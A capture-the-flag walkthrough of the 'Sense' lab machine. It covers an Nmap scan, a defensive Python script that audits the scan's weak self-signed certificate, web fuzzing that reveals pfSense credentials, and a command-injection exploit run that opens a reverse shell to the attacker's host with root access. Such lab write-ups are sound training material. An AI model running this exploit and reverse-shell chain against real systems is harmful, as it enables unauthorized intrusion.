Sense

  • Linux
  • Easy

Recon

  • Nmap
Nmap scan report for 10.129.99.201
Host is up (0.044s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.129.99.201/
443/tcp open  ssl/https?
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Issuer: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-10-14T19:21:35
| Not valid after:  2023-04-06T19:21:35
| MD5:   65f8 b00f 57d2 3468 2c52 0f44 8110 c622
|_SHA-1: 4f7c 9a75 cb7f 70d3 8087 08cb 8c27 20dc 05f1 bb02
|_ssl-date: TLS randomness does not represent time
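The ssl-cert block above already tells a defender most of what is wrong with this TLS endpoint: a 1024-bit RSA key, a subject identical to the issuer (self-signed), the untouched placeholder "Common Name (eg, YOUR name)" and an expired validity window. As an added example (not part of the original writeup, and not an Nmap feature), the script below parses that block and turns it into remediation findings; the sample input is copied from the scan output above, and the 2048-bit threshold is a baseline I chose, not something the page states.

```python
import re
from datetime import datetime

# Constructed sample: the ssl-cert block from the Nmap scan above, verbatim.
NMAP_SSL_CERT = """\
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Issuer: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-10-14T19:21:35
| Not valid after:  2023-04-06T19:21:35
"""

# Assumed baseline for RSA key length; shorter keys are reported as weak.
MIN_RSA_BITS = 2048
PLACEHOLDER_CN = "Common Name (eg, YOUR name)"


def parse_ssl_cert(block):
    """Turn Nmap's ssl-cert script output into a dict of the fields we audit."""
    fields = {}
    for raw in block.splitlines():
        # Strip the NSE output gutter ("| " or "|_") before matching fields.
        line = raw.lstrip("|_ ").strip()
        if line.startswith("ssl-cert: Subject:"):
            fields["subject"] = line.split("Subject:", 1)[1].strip()
        elif line.startswith("Issuer:"):
            fields["issuer"] = line.split(":", 1)[1].strip()
        elif line.startswith("Public Key type:"):
            fields["key_type"] = line.split(":", 1)[1].strip().lower()
        elif line.startswith("Public Key bits:"):
            fields["key_bits"] = int(line.split(":", 1)[1])
        elif line.startswith("Not valid before:"):
            fields["not_before"] = datetime.fromisoformat(line.split(":", 1)[1].strip())
        elif line.startswith("Not valid after:"):
            fields["not_after"] = datetime.fromisoformat(line.split(":", 1)[1].strip())
    return fields


def audit_cert(fields, now=None):
    """Return a list of human-readable findings; an empty list means nothing to fix.

    `now` defaults to the current time so the expiry check is live; pass a
    fixed datetime to reproduce a result.
    """
    now = now or datetime.now()
    findings = []
    if fields.get("key_type") == "rsa" and fields.get("key_bits", 0) < MIN_RSA_BITS:
        findings.append(f"weak key: RSA {fields['key_bits']} bits (< {MIN_RSA_BITS})")
    if fields.get("subject") and fields.get("subject") == fields.get("issuer"):
        findings.append("self-signed: subject equals issuer")
    if PLACEHOLDER_CN in fields.get("subject", ""):
        findings.append("placeholder subject: default template values never replaced")
    if "not_after" in fields and now > fields["not_after"]:
        findings.append(f"expired: not valid after {fields['not_after'].date()}")
    if "not_before" in fields and now < fields["not_before"]:
        findings.append(f"not yet valid: not valid before {fields['not_before'].date()}")
    return findings


if __name__ == "__main__":
    cert = parse_ssl_cert(NMAP_SSL_CERT)
    for finding in audit_cert(cert):
        print("FINDING:", finding)
```

Run against a saved `nmap -sV --script ssl-cert` report, the same parser can be pointed at each `ssl-cert:` block to inventory every self-signed or short-key certificate on a network segment, which is the follow-up a defender would want after seeing this scan.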

Port 80

  • This port only returns redirects to 443.

Port 443

  • Directory fuzzing shows some directories:

    • /changelog.txt

      # Security Changelog 
      
      ### Issue
      There was a failure in updating the firewall. Manual patching is therefore required
      
      ### Mitigated
      2 of 3 vulnerabilities have been patched.
      
      ### Timeline
      The remaining patches will be installed during the next maintenance window
      

    • Fuzzing deeper, we find some text files.

      • A username is revealed, so we can log in to pfSense with the credentials rohit:pfsense.

Exploiting pfSense

  • Searchsploit

    • A command injection exploit looks promising, so we try it.
    ╰─❯ python3 43560.py --rhost 10.129.99.201 --lhost 10.10.14.58 --lport 4444 --username rohit --password pfsense 
    CSRF token obtained
    Running exploit...
    Exploit completed
    
    # On other terminal
    ╰─❯ rlwrap nc -lvnp 4444
    listening on [any] 4444 ...
    connect to [10.10.14.58] from (UNKNOWN) [10.129.99.201] 4776
    sh: can't access tty; job control turned off
    id
    uid=0(root) gid=0(wheel) groups=0(wheel)